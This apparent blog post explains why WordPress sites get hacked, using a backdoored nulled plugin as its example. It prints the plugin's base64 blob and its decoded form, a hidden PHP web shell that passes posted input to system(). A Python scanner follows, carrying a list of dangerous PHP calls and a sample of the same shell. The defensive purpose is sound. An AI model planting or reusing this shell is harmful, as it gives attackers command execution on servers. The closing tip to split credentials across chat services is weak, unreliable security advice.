Why are many WordPress sites being hacked every day?
WordPress hacking is a common thing nowadays. Every day thousands of WordPress sites are hacked because of missing security measures, vulnerable plugins, server-side holes, and many other reasons. I have seen many WordPress sites hacked because of symlink problems on the server and because of premium plugins downloaded from nulled theme sites. As an example, once I downloaded a plugin named WP Rocket from https://null-24.com/ and I saw that malicious code had been injected into the plugin. The code looked like this.
[php] PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD1wb3N0IHN0eWxlPSJkaXNwbGF5Om5vbmUiPgpDb21tYW5kOiA8aW5wdXQgbmFtZT1jb2RlIHR5cGU9dGV4dCBzaXplPTEwMCB2YWx1ZT0iPD9waHAgaWYgKGlzc2V0KCRfUE9TVFsiY29kZSJdKSl7cHJpbnQoc3RyaXBzbGFzaGVzKCRfUE9TVFsiY29kZSJdKSk7fSA/PiI+CjxpbnB1dCB0eXBlPXN1Ym1pdD4KPC9mb3JtPgo8cHJlPgo8P3BocCBpZiAoaXNzZXQoJF9QT1NUWyJjb2RlIl0pKXtzeXN0ZW0oc3RyaXBzbGFzaGVzKCRfUE9TVFsiY29kZSJdKS4iIDI+JjEiKTt9ID8+CjwvcHJlPg== [/php]
It was base64 encoded, so anyone without programming knowledge would not understand it, and the file was named config.php so that people would think it was the plugin's configuration file. But you will understand how dangerous it was after decoding it. I used a site to decode the encoded text, https://www.base64decode.org/. You can find many other tools, programs or sites by searching on Google. So, let's see what it shows after decoding.
Server-destroying PHP script
[php]
<form action="" method=post style="display:none">
Command: <input name=code type=text size=100 value="<?php if (isset($_POST["code"])){print(stripslashes($_POST["code"]));} ?>">
<input type=submit>
</form>
<pre>
<?php if (isset($_POST["code"])){system(stripslashes($_POST["code"])." 2>&1");} ?>
</pre>
[/php]
So this was a hidden form inside the plugin. There were also many other files. After the plugin is installed, the hacker automatically receives an email with a username and password hash from the database, along with the URL of the site it was installed on. The installation site URL alone is enough to hack the site using the code above.
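As an added example (not code from the original post), here is a small Python scanner that automates the manual decoding above across a whole plugin or theme directory: it finds long base64 runs in .php files, decodes the ones that turn out to be text, and flags any that call a command- or code-execution function, noting whether request input feeds it. The list of suspicious calls and the two sample files are this example's own constructions.

```python
import base64
import os
import re

# PHP calls that run commands or code; one of these inside a decoded blob is the signal
# (the page's decoded config.php called system()). The list is this example's choice.
SUSPICIOUS_CALLS = ("system(", "exec(", "shell_exec(", "passthru(", "eval(", "assert(")
REQUEST_INPUT = ("$_POST", "$_GET", "$_REQUEST", "$_COOKIE")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long enough to hide a script

def decode_text_blobs(source):
    """Yield (blob, decoded) for base64 runs that decode to text; binary (e.g. PNG icons) is skipped."""
    for match in B64_RUN.finditer(source):
        blob = match.group(0)
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
            yield blob, decoded

def find_hidden_shells(source):
    """One finding per decoded blob that calls a dangerous function."""
    findings = []
    for blob, decoded in decode_text_blobs(source):
        calls = [c for c in SUSPICIOUS_CALLS if c in decoded]
        if calls:  # request_input: the blob also reads attacker-controllable data
            findings.append({"blob_prefix": blob[:12], "calls": calls,
                             "request_input": any(g in decoded for g in REQUEST_INPUT)})
    return findings

def scan_tree(root):
    """Walk a plugin or theme directory and map each .php file to its findings."""
    report = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_shells(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed samples (not from the page): a clean file carrying an inline PNG icon, and
# a "config.php" body hiding the same kind of command runner the page decoded.
CLEAN_PHP = ('<?php $icon = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNk'
             'YPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=="; ?>')
SHELL_SRC = '<?php if (isset($_POST["code"])) { system(stripslashes($_POST["code"])); } ?>'
BACKDOOR_PHP = "<?php\n// plugin configuration\n" + base64.b64encode(SHELL_SRC.encode()).decode() + "\n"
```

Run `scan_tree("/path/to/wp-content/plugins")` after unpacking a plugin and review every flagged file by hand; a hit is a strong hint, not proof, so inspect the decoded text before deleting anything.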
So, here I am giving a list of possible reasons why WordPress sites get hacked.
Common reasons WordPress sites get hacked
#1. Using a premium (licensed) plugin from an unauthorized source like null-24.com without any security review of its code.
#2. An outdated WordPress version (attacked using known exploits).
#3. A vulnerable theme (for example, one without proper input escaping and sanitization), typically developed by new or careless developers.
#4. A weak password for the dashboard login.
#5. Improper file permissions on the server.
#6. A vulnerable server.
#7. Symlink problems with the server.
#8. Any configuration file uploaded to the server, such as .git configuration files when the .git repository is publicly accessible, or any text file with stored credentials.
#9. Saving your login password in the browser when your computer's browser gets compromised.
#10. Logging in to your account from a compromised PC.
#11. Using a password manager that then gets compromised.
#12. Sharing dashboard, cPanel or hosting dashboard login credentials through any electronic medium.
#13. Using an untrusted password manager.
#14. Sharing the credentials with someone you trust whose account then becomes compromised. So be careful about this: you are not safe even if your own account is secure, so think again about the account of the person you are sharing with. My suggestion is to share the username through one medium like Skype, the password through another medium like Messenger or email, and the site URL through yet another. Then, if any one account is compromised, the hacker will not be able to work out the login URL or where to use the password.
If you want to know how to protect your WordPress site from being hacked, visit the URL below.
How to secure WordPress and ensure security to prevent WordPress from getting hacked?